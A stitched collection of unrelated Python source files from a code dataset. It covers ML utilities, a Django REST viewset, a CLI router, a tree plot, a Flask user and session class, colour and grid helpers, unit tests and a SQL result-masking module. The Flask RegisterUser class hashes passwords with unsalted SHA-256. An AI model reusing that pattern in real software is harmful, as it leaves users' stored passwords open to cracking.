np.asarray(balance_vector).astype(np.float32) balance_vector = (balance_vector - balance_vector.min()) / (balance_vector.max() - balance_vector.min()) return balance_vector def set_seed(seed): torch.backends.cudnn.deterministic = True random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) np.random.seed(seed) def remove_classes(trainset, to_keep): # trainset.data = trainset.data[order] trainset.targets = np.array(trainset.targets) # trainset.targets = trainset.targets[order] indices = np.zeros_like(trainset.targets) for a in to_keep: indices = indices + (trainset.targets == a).astype(int) indices = np.nonzero(indices) trainset.data = [trainset.data[i] for i in indices[0]] # trainset.data = trainset.data[indices] trainset.targets = np.array(trainset.targets) trainset.targets = trainset.targets[indices] return trainset
StarcoderdataPython
65697
# -*- coding: utf-8 -*- from __future__ import unicode_literals from rest_framework.viewsets import GenericViewSet from rest_framework import mixins from irekua_database import models from irekua_rest_api import serializers from irekua_rest_api import utils from irekua_rest_api.permissions import IsAdmin from irekua_rest_api.permissions import IsDeveloper from irekua_rest_api.permissions import ReadOnly class TermViewSet(mixins.UpdateModelMixin, mixins.RetrieveModelMixin, mixins.DestroyModelMixin, utils.CustomViewSetMixin, GenericViewSet): queryset = models.Term.objects.all() # pylint: disable=E1101 serializer_mapping = utils.SerializerMapping.from_module( serializers.terms.terms) permission_mapping = utils.PermissionMapping( default=IsDeveloper | IsAdmin | ReadOnly)
StarcoderdataPython
4801397
# ***************************************************************************** # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # ****************************************************************************** from dlab_core.domain.exceptions import DLabException LC_ERR_ARGUMENT_TYPE_DICT = 'Argument must be of type dict.' class RoutingException(DLabException): """Base class for Routing exceptions""" pass class RouteArgumentTypeException(RoutingException): pass class RouteArgumentKeyException(RoutingException): pass class RouteArgumentValueException(RoutingException): pass class RouteInvokeCallableException(RoutingException): pass class CLIRoute(object): def __init__(self, invoke, arguments): """ :type invoke: callable :param invoke: method that will be invoked by router :type arguments: dict :param arguments: command, split into an array of strings """ self.invoke = invoke self.arguments = arguments @property def invoke(self): """ :rtype invoke: callable :return invoke: method that will be invoked by router """ return self._invoke @invoke.setter def invoke(self, invoke): """ :type invoke: callable :param invoke: method that will be invoked by router """ if not callable(invoke): raise RouteInvokeCallableException() self._invoke = invoke @property def arguments(self): """ :rtype arguments: dict :return arguments: dict of arguments, where key is index of argument and value - the argument itself """ return self._arguments @arguments.setter def arguments(self, arguments): """ :type arguments: dict :param arguments: dict of arguments, where key is index of argument and value - the argument itself """ if not isinstance(arguments, dict): raise RouteArgumentTypeException(LC_ERR_ARGUMENT_TYPE_DICT) for item in arguments.items(): self.validate_arguments_dict(*item) self._arguments = arguments @staticmethod def validate_arguments_dict(key, value): if not isinstance(key, int): raise RouteArgumentKeyException(key) if not isinstance(value, str): raise RouteArgumentValueException(value) class CLIRouter(object): def __init__(self, routes=()): self._routes = [] if len(routes): for route in routes: self.add(route) def add(self, route): """ :type route: CLIRoute :param route: Cli route. """ if isinstance(route, CLIRoute): self._routes.append(route) def match(self, args): """ :type args: list :param args: command, split into an array of strings :rtype Route :return route matched by all parameters with maximum match size """ items = [r for r in self._routes if self.match_args(r.arguments, args)] return self.extract_maximum_match(items) @staticmethod def extract_maximum_match(routes): # crete list of dicts with route and sorted arguments index items = [{'route': r, 'indexes': sorted(r.arguments)} for r in routes] # while route items have elements in orders indexes list while any(map(lambda x: x['indexes'], items)): # get general maximum index of all routes arguments max_id = max(map(lambda x: x['indexes'][-1], items)) # pop maximum routes indexes and filter routes, # that has this index equal to general maximum value items = list(filter(lambda x: x['indexes'].pop() == max_id, items)) return [item['route'] for item in items] @staticmethod def match_args(route_args, cli_args): """ :type route_args: dict :param route_args: dict of route args :type cli_args: list :param cli_args: cli arguments :rtype: bool :returns True or False depending on matching cli args to routing args If maximum route arguments index is less then cli args count and values from cli equal corresponding indexes values return True """ return (max(route_args) < len(cli_args) and all( [cli_args[index] == val for index, val in route_args.items()]))
StarcoderdataPython
6875
<filename>src_taxonomy/bubble_tree_map.py #!/usr/bin/env python # -*- coding: UTF-8 -*- import random from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace def layout(node): if not node.is_root(): # Add node name to laef nodes #N = AttrFace("name", fsize=14, fgcolor="black") #faces.add_face_to_node(N, node, 0) #pass faces.add_face_to_node(TextFace(node.name), node, 0) if "weight" in node.features: # Creates a sphere face whose size is proportional to node's # feature "weight" C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere") # Let's make the sphere transparent C.opacity = 0.3 # And place as a float face over the tree faces.add_face_to_node(C, node, 0, position="float") def give_tree_layout(t): # Some random features in all nodes for n in t.traverse(): n.add_features(weight=n.dist*20) # Create an empty TreeStyle ts = TreeStyle() # Set our custom layout function ts.layout_fn = layout # Draw a tree #ts.mode = "c" #ts.arc_start = -180 #ts.arc_span = 180 # We will add node names manually #ts.show_leaf_name = True # Show branch data #ts.show_branch_length = True #ts.show_branch_support = True return ts class Tree7s(object): def __init__(self, lab): self.root = Node7s(lab, 0, 0) def find_root(self): return self.root class Node7s(object): def __init__(self, data, score, lev): self.data = data self.score = score self.level = lev self.children = [] def add_child(self, lab, score, lev): if int(self.level) == int(lev-1): nn = self.find_child(lab) if nn == None: self.children.append(Node7s(lab, score, lev)) else: nn.increase_score(score) else: print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data def find_child(self, label): for el in self.children: if el.data == label: return el return None def increase_score(self, sc): self.score += sc def print_me(self): print self.data, self.score for el in self.children: el.print_me() def create_newick(self): if self.children == []: return str(self.data + ":" + str(self.score)) newick = "(" for el in self.children: newick += el.create_newick() + "," newick = newick[:-1] if self.level == 0: newick += ")" + str(self.data) + "." else: newick += ")" + str(self.data) + ":" + str(self.score) return newick def test_data(): D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\ {"confident": "no", "score": "0.304296", "label": "/pets/cats"},\ {"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]} t7s = Tree7s("ThingAdamsFamily") for el in D["taxonomy"]: #n = t7s n = t7s.find_root() taxonomy_tree = el["label"] taxonomy_tree = taxonomy_tree.split("/") taxonomy_tree.pop(0) levels = len(taxonomy_tree) score = float(el["score"]) print levels, taxonomy_tree, score for i in range(levels): label = taxonomy_tree[i] #if n.find_child(label) == None: n.add_child(label, score, i+1) n = n.find_child(label) t7s.find_root().print_me() t = t7s.find_root() S = t.create_newick() + ";" print S #S = "(((A,B,(C.,D)E)F,(S,N)K)R);" #T = Tree(S, format=8) T = Tree(S, format=1) for node in T.traverse("postorder"): # Do some analysis on node print node.name for node in T.traverse("levelorder"): # Do some analysis on node print node.name #for branch in T return T if __name__ == "__main__": #t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) #t.show(tree_style=ts) t = test_data() ts = give_tree_layout(t) t.show(tree_style=ts) t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
StarcoderdataPython
39756
<filename>laba/user.py from flask import g, session import pymysql import redis import random import string from json import loads, dumps from exceptions.userException import * from hashlib import sha256 class User(): __changed = {} _values = {} __loggedIn = True __initialized = False __health = False def __init__(self): raise NotInitializeable("User") def _init(self, app): """User Object""" self.app = app if not hasattr(g, 'db'): g.db = pymysql.connect(user=app.config["DB_USER"], db=app.config["DB_DB"], password=app.config["DB_PWD"], host=app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=app.config["REDIS_HOST"], port=app.config["REDIS_PORT"], db=app.config["REDIS_DB"]) self.__initialized = True # |\_/| # | @ @ Watch! # | <> _ # | _/\------____ ((| |)) # | `--' | # ____|_ ___| |___.' # /_/_____/____/_______| #^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ def query(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchall() def queryOne(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchone() def recover(self): """Call to prevent pymysql Interface error after recovering from session cache""" if not hasattr(g, 'db'): g.db = pymysql.connect(user=self.app.config["DB_USER"], db=self.app.config["DB_DB"], password=self.app.config["DB_PWD"], host=self.app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=self.app.config["REDIS_HOST"], port=self.app.config["REDIS_PORT"], db=self.app.config["REDIS_DB"]) @property def wsuuid(self): return g.redis.get(self._values["username"]) @wsuuid.setter def wsuuid(self, wsuuid): g.redis.set(self._values["username"], wsuuid, self.app.config["AUTO_LOGOUT"]) @wsuuid.deleter def wsuuid(self): g.redis.delete(self._values["username"]) @property def id(self): return self._values["id"] @property def uuid(self): return self.__uuid @property def health(self): return self.__health @property def username(self): return self._values["username"] @username.setter def username(self, value): if self._values["username"] != value: self._values["username"] = value self.__changed['username'] = value @property def firstName(self): return self._values["firstName"] @firstName.setter def firstName(self, value): if self._values["firstName"] != value: self._values["firstName"] = value self.__changed['firstName'] = value @property def lastName(self): return self._values["lastName"] @lastName.setter def lastName(self, value): if self._values["lastName"] != value: self._values["lastName"] = value self.__changed['lastName'] = value @property def email(self): return self._values["email"] @email.setter def email(self, value): if self._values["email"] != value: self._values["email"] = value self.__changed['email'] = value @property def ctime(self): return self._values["ctime"] @ctime.setter def ctime(self, value): if self._values["ctime"] != value: self._values["ctime"] = value self.__changed['ctime'] = value @property def atime(self): return self._values["atime"] @atime.setter def atime(self, value): if self._values["atime"] != value: self._values["atime"] = value self.__changed['atime'] = value @property def status(self): return self._values["status"] @status.setter def status(self, value): if self._values["status"] != value: self._values["status"] = value self.__changed['status'] = value @property def icon(self): return self._values["icon"] @icon.setter def icon(self, value): if self._values["icon"] != value: self._values["icon"] = value self.__changed['icon'] = value def changePwd (self, old, new): r = self.cursor.execute("UPDATE users SET password=<PASSWORD>(%s, <PASSWORD>) WHERE id=%s AND password=<PASSWORD>, <PASSWORD>);", (new, self.__id, old)) if not r: raise BadUserCredentials(self.__username) def commit2db(self): if self.__changed: sql="UPDATE users SET {0} WHERE users.id = {1}".format(", ".join(i+"=%s" for i in self.__changed.keys()), self._values["id"]) self.query(sql, tuple(self.__changed.values())) def __serialize(self): self._values['atime'] = str(self._values['atime']) #Keep private! It's changing self.__value!!! self._values['ctime'] = str(self._values['ctime']) return dumps(self._values) def commit2redis(self): g.redis.set(self._uuid, self.__serialize(), self.app.config["AUTO_LOGOUT"]) def logOut(self): self.__loggedIn = False g.redis.delete(session["uuid"]) session.pop("uuid") def startSession(self): self.__health = True def __del__(self): if self.__initialized and self.__health: self.commit2db() self.cursor.close() g.db.commit() if self.__loggedIn: self.commit2redis() class LoginUser(User): def __init__(self, app, username, password): """Checks User cred and logs in + moves to redis if ready""" User._init(self, app) self._values = self.queryOne("""SELECT id, username, firstName, lastName, email, ctime, atime, status, icon, enabled FROM users WHERE (username = %s or email = %s) AND password = <PASSWORD>)""", (username, username, password)) if not self._values: raise BadUserCredentials(username) if not self._values["enabled"]: raise UserDisabled(username) self.startSession() self._uuid = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) session['uuid'] = self._uuid class RedisUser(User): def __init__(self, app): if not 'uuid' in session: raise UserNotInitialized() User._init(self, app) self._uuid = session["uuid"] vals = g.redis.get(session['uuid']) if not vals: session.pop("uuid") raise UserNotInitialized() self.startSession() self._values = loads(vals) class RegisterUser(): _values = {} def __init__(self, app): self.app = app assert not 'uuid' in session if not hasattr(g, 'db'): g.db = pymysql.connect(user=app.config["DB_USER"], db=app.config["DB_DB"], password=app.config["DB_PWD"], host=app.config["DB_HOST"], cursorclass=pymysql.cursors.DictCursor) self.cursor = g.db.cursor() if not hasattr(g, 'redis'): g.redis = redis.Redis(host=app.config["REDIS_HOST"], port=app.config["REDIS_PORT"], db=app.config["REDIS_DB"]) def query(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchall() def queryOne(self, query, param = ()): self.cursor.execute(query, param) return self.cursor.fetchone() @property def username(self): return self._values["username"] @username.setter def username(self, value): if self.queryOne("SELECT id FROM users WHERE username=%s", value): raise RegistrationErrorDupplicate("username") self._values["username"] = value @property def email(self): return self._values["email"] @email.setter def email(self, value): if self.queryOne("SELECT id FROM users WHERE email=%s", value): raise RegistrationErrorDupplicate("email") self._values["email"] = value @property def firstName(self): return self._values["firstName"] @firstName.setter def firstName(self, value): self._values["firstName"] = value @property def lastName(self): return self._values["lastName"] @lastName.setter def lastName(self, value): self._values["lastName"] = value @property def password(self): return self._values["password"] @password.setter def password(self, val): self._values["password"] = sha256(val.encode()).hexdigest() def commit2redis(self): if not all(k in self._values for k in ["email", "password", "username", "firstName", "lastName"]): for i in ["email", "password", "username", "firstName", "lastName"]: if i not in self._values: raise RegistrationErrorInfoMissing(i) token = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) g.redis.set(token, dumps(self._values), self.app.config["TOKEN_TIMEOUT"]) return token def confirmToken(self, token): vals = loads(g.redis.get(token)) if not vals: raise InvalidToken(token) g.redis.delete(token) #WARNING: No check for dupl entry -> time from registerRequest to confirmation: unprotected ~ Problem? #Without Exception Handling in Prod. env.: YES -> apk BBQ try: self.query("INSERT INTO users (email, password, username, firstname, lastname) VALUES (%s, %s, %s, %s, %s)", ( vals["email"], vals["password"], vals["username"], vals["firstName"], vals["lastName"])) except pymysql.IntegrityError: raise RegistrationErrorDupplicate("email / username")
StarcoderdataPython
73235
""" This module defines the paths that GPUVerify will use to run the various tools that GPUVerify Depends on. These paths must be absolute paths. """ import os import sys # THIS IS A TEMPLATE FOR DEVELOPMENT. MODIFY THE PATHS TO SUIT YOUR BUILD # ENVIRONMENT. THEN COPY THIS FILE INTO THE ROOT GPUVERIFY DIRECTORY (where # GPUVerify.py lives) AND RENAME IT TO "gvfindtools.py". "gvfindtools.py" WILL # BE IGNORED BY MERCURIAL SO IT WILL NOT BE UNDER VERSION CONTROL SO THAT YOU # CAN MAINTAIN YOUR OWN PERSONAL COPY OF "gvfindtools.py" WITHOUT AFFECTING # OTHER DEVELOPERS. # # Please note Windows users should use the following style: # rootDir = r"c:\projects\gpuverify" # bugleSrcDir = rootDir + r"\bugle\src" rootDir = os.environ["BUILD_ROOT"] # The path to the Bugle Source directory. # The include-blang/ folder should be there bugleSrcDir = os.environ["BUGLE_DIR"] # The Path to the directory where the "bugle" executable can be found. bugleBinDir = bugleSrcDir + "/build" # The path to the libclc Source directory. libclcSrcDir = rootDir + "/libclc" # The path to the libclc install directory. # The include/ and lib/clc/ folders should be there libclcInstallDir = rootDir + "/libclc-install" # The path to the llvm Source directory. llvmSrcDir = rootDir + '/llvm' # The path to the directory containing the llvm binaries. # llvm-nm, clang and opt should be there llvmBinDir = os.environ["DOWNLOADS_DIR"] + "/" + os.environ["LLVM"] + "/bin" # The path containing the llvm libraries llvmLibDir = os.environ["DOWNLOADS_DIR"] + "/" + os.environ["LLVM"] + "/lib" # The path to the directory containing the GPUVerify binaries. # GPUVerifyVCGen.exe, GPUVerifyCruncher.exe and GPUVerifyBoogieDriver.exe should be there gpuVerifyBinDir = os.environ["GPUVERIFY_DIR"] + "/Binaries" # The path to the z3 Source directory. z3SrcDir = rootDir + '/z3' # The path to the directory containing z3.exe z3BinDir = rootDir # The path to the cvc4 Source directory. cvc4SrcDir = rootDir + '/CVC4' # The path to the directory containing cvc4.exe cvc4BinDir = rootDir # Default solver should be one of ['z3','cvc4'] defaultSolver = os.environ["DEFAULT_SOLVER"] # If true mono will prepended to every command involving CIL executables useMono = True if os.name == 'posix' else False def init(prefixPath): """This method does nothing""" pass
StarcoderdataPython
4816128
from collections import defaultdict from functools import wraps from lru import LRU import math BoundCache = defaultdict(lambda: LRU(3000)) class Color: ZERO = (0, 0, 0, 0) WHITE = (0, 0, 1, 3500) EMPTIES = (ZERO, None) @classmethod def dead(kls, color): return color in kls.EMPTIES or color[2] == 0 @classmethod def override(kls, color, hue=None, saturation=None, brightness=None, kelvin=None): if hue is None and saturation is None and brightness is None and kelvin is None: return color hue_change = (hue,) if hue is not None else None saturation_change = (saturation,) if saturation is not None else None brightness_change = (brightness,) if brightness is not None else None kelvin_change = (kelvin,) if kelvin is not None else None return kls.adjust( color, hue_change=hue_change, saturation_change=saturation_change, brightness_change=brightness_change, kelvin_change=kelvin_change, ) @classmethod def adjust( kls, color, hue_change=None, saturation_change=None, brightness_change=None, kelvin_change=None, ): h, s, b, k = color if hue_change is not None and isinstance(hue_change, tuple): h = hue_change[0] elif hue_change: h += hue_change if saturation_change is not None and isinstance(saturation_change, tuple): s = saturation_change[0] elif saturation_change: s += saturation_change if brightness_change is not None and isinstance(brightness_change, tuple): b = brightness_change[0] elif brightness_change: b += brightness_change if kelvin_change is not None and isinstance(kelvin_change, tuple): k = kelvin_change[0] elif kelvin_change: k += kelvin_change if hue_change: if h < 0: h = 0 elif h > 360: h = 360 if saturation_change: if s < 0: s = 0 elif s > 1: s = 1 if brightness_change: if b < 0: b = 0 elif b > 1: b = 1 if kelvin_change: if k < 0: k = 0 elif k > 0xFFFF: k = 0xFFFF else: k = int(k) return h, s, b, k def average_color(colors): colors = [c for c in colors if c is not None] if not colors: return None if len(set(colors)) == 1: return colors[0] hue_x_total = 0 hue_y_total = 0 saturation_total = 0 brightness_total = 0 kelvin_total = 0 for color in colors: if isinstance(color, tuple): h, s, b, k = color else: h = color.hue s = color.saturation b = color.brightness k = color.kelvin hue_x_total += math.sin(h * 2.0 * math.pi / 360) hue_y_total += math.cos(h * 2.0 * math.pi / 360) saturation_total += s brightness_total += b if k == 0: kelvin_total += 3500 else: kelvin_total += k hue = math.atan2(hue_x_total, hue_y_total) / (2.0 * math.pi) if hue < 0.0: hue += 1.0 hue *= 360 number_colors = len(colors) saturation = saturation_total / number_colors brightness = brightness_total / number_colors kelvin = int(kelvin_total / number_colors) return (hue, saturation, brightness, kelvin) def _points_bound_cache(func): name = func.__name__ if name in ("row", "col"): @wraps(func) def wrapped(kls, *args, **kwargs): key = None if len(args) == 2: key = args cached = None if key is not None: cached = BoundCache[name].get(key) if cached is None: cached = list(func(kls, *args, **kwargs)) if key is not None: BoundCache[name][key] = cached return cached else: @wraps(func) def wrapped(kls, *args, **kwargs): bounds = None if len(args) == 1: bounds = args[0] cached = None if bounds is not None: cached = BoundCache[name].get(bounds) if cached is None: result = func(kls, *args, **kwargs) if name != "count_points": result = list(result) cached = BoundCache[name][bounds] = result return cached return wrapped class Points: @classmethod @_points_bound_cache def cols(kls, bounds): (l, r), _, _ = bounds for col in range(l, r): yield kls.col(col, bounds) @classmethod @_points_bound_cache def rows(kls, bounds): _, (t, b), _ = bounds for row in range(t, b, -1): yield kls.row(row, bounds) @classmethod @_points_bound_cache def all_points(kls, bounds): for row in kls.rows(bounds): yield from row @classmethod @_points_bound_cache def count_points(kls, bounds): return sum(len(row) for row in kls.rows(bounds)) @classmethod @_points_bound_cache def row(kls, row, bounds): (l, r), _, _ = bounds return [(col, row) for col in range(l, r)] @classmethod @_points_bound_cache def col(kls, col, bounds): _, (t, b), _ = bounds return [(col, row) for row in range(t, b, -1)] @classmethod def expand(kls, bounds, amount): (l, r), (t, b), (w, h) = bounds return (l - amount, r + amount), (t + amount, b - amount), (w + amount * 2, h + amount * 2) @classmethod def relative(kls, point, bounds): (l, _), (t, _), _ = bounds return point[0] - l, t - point[1] @classmethod def bottom_row(kls, bounds): _, (_, b), _ = bounds return b @classmethod def top_row(kls, bounds): _, (t, _), _ = bounds return t
StarcoderdataPython
3318894
""" Created on Saturday 22 feb 04:53:34 2020 @author: nkalyan🤠 '''Implementing test cases on Python Scripts on strings and file ''' """ import unittest from HW05_nikhil_kalyan import reverse_string, find_second, get_lines, sub_string class ReverseTest(unittest.TestCase): """ test reverse function """ def test_reverse_string(self): """ verify that reverse string function works properly """ self.assertEqual(reverse_string(""), "") self.assertEqual(reverse_string("789"), "987") self.assertEqual(reverse_string("vedanta"), "atnadev") class SubstringTest(unittest.TestCase): """Test substring function""" def test_sub_string(self): """Verify substring works properly""" string: str = "Hello" var_name: str = "<NAME>" self.assertEqual(sub_string("He", string), string.find('He')) self.assertEqual(sub_string('n', var_name), var_name.find("n")) self.assertNotEqual(sub_string('Groot', var_name), var_name.find("I am")) class FindSecondTest(unittest.TestCase): """ test find_second """ def test_find_second(self): """ verify that find_second works properly """ self.assertTrue(find_second('Tony', 'TonyTonystark') == 4) self.assertTrue(find_second('abba', 'abbabba') == 3) self.assertTrue(find_second(' ', 'avengers') == -1) self.assertEqual ( find_second('ba', 'babablacksheep'), 2) class GetLinesTest(unittest.TestCase): """ test get_lines """ def test_get_lines(self): """ verify that get_lines works properly """ path_name = 'text.txt' file_name = 'C:/Users/NICKY/PycharmProjects/SWW810/SSW810 Homework/text1.txt' expect1 = [] expect: List[str] = ['<line0>', '<line1>', '<line2>', '<line3.1 line3.2 line3.3>', '<line4.1 line4.2>', '<line5>', '<line6>'] result = list(get_lines(file_name)) self.assertEqual(result, expect) self.assertEqual(list(get_lines(path_name)), expect1) self.assertEqual(list(get_lines(file_name)), result) if __name__ == '__main__': unittest.main(exit=False, verbosity=2)
StarcoderdataPython
3306070
# -*- coding:utf-8 -*- import logging import sqlparse from django.forms import model_to_dict from sqlparse.tokens import Keyword import pandas as pd from sql.engines.goinception import GoInceptionEngine from sql.models import DataMaskingRules, DataMaskingColumns import re import traceback logger = logging.getLogger('default') def data_masking(instance, db_name, sql, sql_result): """脱敏数据""" try: keywords_count = {} # 解析查询语句,判断UNION需要单独处理 p = sqlparse.parse(sql)[0] for token in p.tokens: if token.ttype is Keyword and token.value.upper() in ['UNION', 'UNION ALL']: keywords_count['UNION'] = keywords_count.get('UNION', 0) + 1 # 通过goInception获取select list inception_engine = GoInceptionEngine() select_list = inception_engine.query_data_masking(instance=instance, db_name=db_name, sql=sql) # 如果UNION存在,那么调用去重函数 select_list = del_repeat(select_list, keywords_count) if keywords_count else select_list # 分析语法树获取命中脱敏规则的列数据 hit_columns = analyze_query_tree(select_list, instance) sql_result.mask_rule_hit = True if hit_columns else False # 对命中规则列hit_columns的数据进行脱敏 masking_rules = {i.rule_type: model_to_dict(i) for i in DataMaskingRules.objects.all()} if hit_columns and sql_result.rows: rows = list(sql_result.rows) for column in hit_columns: index, rule_type = column['index'], column['rule_type'] masking_rule = masking_rules.get(rule_type) if not masking_rule: continue for idx, item in enumerate(rows): rows[idx] = list(item) rows[idx][index] = regex(masking_rule, rows[idx][index]) sql_result.rows = rows # 脱敏结果 sql_result.is_masked = True except Exception as msg: logger.warning(f'数据脱敏异常,错误信息:{traceback.format_exc()}') sql_result.error = str(msg) sql_result.status = 1 return sql_result def del_repeat(select_list, keywords_count): """输入的 data 是inception_engine.query_data_masking的list结果 去重前 [{'index': 0, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'}, {'index': 1, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'}] 去重后 [{'index': 0, 'field': 'phone', 'type': 'varchar(80)', 'table': 'users', 'schema': 'db1', 'alias': 'phone'}] 返回同样结构的list. keywords_count 关键词出现的次数 """ # 先将query_tree转换成表,方便统计 df = pd.DataFrame(select_list) #从原来的库、表、字段去重改为字段 #result_index = df.groupby(['field', 'table', 'schema']).filter(lambda g: len(g) > 1).to_dict('records') result_index = df.groupby(['field']).filter(lambda g: len(g) > 1).to_dict('records') # 再统计重复数量 result_len = len(result_index) # 再计算取列表前多少的值=重复数量/(union次数+1) group_count = int(result_len / (keywords_count['UNION'] + 1)) result = result_index[:group_count] return result def analyze_query_tree(select_list, instance): """解析select list, 返回命中脱敏规则的列信息""" # 获取实例全部激活的脱敏字段信息,减少循环查询,提升效率 masking_columns = { f"{i.instance}-{i.table_schema}-{i.table_name}-{i.column_name}": model_to_dict(i) for i in DataMaskingColumns.objects.filter(instance=instance, active=True) } # 遍历select_list 格式化命中的列信息 hit_columns = [] for column in select_list: table_schema, table, field = column.get('schema'), column.get('table'), column.get('field') masking_column = masking_columns.get(f"{instance}-{table_schema}-{table}-{field}") if masking_column: hit_columns.append({ "instance_name": instance.instance_name, "table_schema": table_schema, "table_name": table, "column_name": field, "rule_type": masking_column['rule_type'], "is_hit": True, "index": column['index'] }) return hit_columns def regex(masking_rule, value): """利用正则表达式脱敏数据""" rule_regex = masking_rule['rule_regex'] hide_group = masking_rule['hide_group'] # 正则匹配必须分组,隐藏的组会使用****代替 try: p = re.compile(rule_regex, re.I) m = p.search(str(value)) masking_str = '' for i in range(m.lastindex): if i == hide_group - 1: group = '****' else: group = m.group(i + 1) masking_str = masking_str + group return masking_str except AttributeError: return value def brute_mask(instance, sql_result): """输入的是一个resultset sql_result.full_sql sql_result.rows 查询结果列表 List , list内的item为tuple 返回同样结构的sql_result , error 中写入脱敏时产生的错误. """ # 读取所有关联实例的脱敏规则,去重后应用到结果集,不会按照具体配置的字段匹配 rule_types = DataMaskingColumns.objects.filter(instance=instance).values_list('rule_type', flat=True).distinct() masking_rules = DataMaskingRules.objects.filter(rule_type__in=rule_types) for reg in masking_rules: compiled_r = re.compile(reg.rule_regex, re.I) replace_pattern = r"" rows = list(sql_result.rows) for i in range(1, compiled_r.groups + 1): if i == int(reg.hide_group): replace_pattern += r"****" else: replace_pattern += r"\{}".format(i) for i in range(len(sql_result.rows)): temp_value_list = [] for j in range(len(sql_result.rows[i])): # 进行正则替换 temp_value_list += [compiled_r.sub(replace_pattern, str(sql_result.rows[i][j]))] rows[i] = tuple(temp_value_list) sql_result.rows = rows return sql_result def simple_column_mask(instance, sql_result): """输入的是一个resultset sql_result.full_sql sql_result.rows 查询结果列表 List , list内的item为tuple sql_result.column_list 查询结果字段列表 List 返回同样结构的sql_result , error 中写入脱敏时产生的错误. """ # 获取当前实例脱敏字段信息,减少循环查询,提升效率 masking_columns = DataMaskingColumns.objects.filter(instance=instance, active=True) # 转换sql输出字段名为小写, 适配oracle脱敏 sql_result_column_list = [c.lower() for c in sql_result.column_list] if masking_columns: try: for mc in masking_columns: # 脱敏规则字段名 column_name = mc.column_name.lower() # 脱敏规则字段索引信息 _masking_column_index = [] if column_name in sql_result_column_list: _masking_column_index.append(sql_result_column_list.index(column_name)) # 别名字段脱敏处理 try: for _c in sql_result_column_list: alias_column_regex = r'"?([^\s"]+)"?\s+(as\s+)?"?({})[",\s+]?'.format(re.escape(_c)) alias_column_r = re.compile(alias_column_regex, re.I) # 解析原SQL查询别名字段 search_data = re.search(alias_column_r, sql_result.full_sql) # 字段名 _column_name = search_data.group(1).lower() s_column_name = re.sub(r'^"?\w+"?\."?|\.|"$', '', _column_name) # 别名 alias_name = search_data.group(3).lower() # 如果字段名匹配脱敏配置字段,对此字段进行脱敏处理 if s_column_name == column_name: _masking_column_index.append(sql_result_column_list.index(alias_name)) except: pass for masking_column_index in _masking_column_index: # 脱敏规则 masking_rule = DataMaskingRules.objects.get(rule_type=mc.rule_type) # 脱敏后替换字符串 compiled_r = re.compile(masking_rule.rule_regex, re.I | re.S) replace_pattern = r"" for i in range(1, compiled_r.groups + 1): if i == int(masking_rule.hide_group): replace_pattern += r"****" else: replace_pattern += r"\{}".format(i) rows = list(sql_result.rows) for i in range(len(sql_result.rows)): temp_value_list = [] for j in range(len(sql_result.rows[i])): column_data = sql_result.rows[i][j] if j == masking_column_index: column_data = compiled_r.sub(replace_pattern, str(sql_result.rows[i][j])) temp_value_list += [column_data] rows[i] = tuple(temp_value_list) sql_result.rows = rows except Exception as e: sql_result.error = str(e) return sql_result
StarcoderdataPython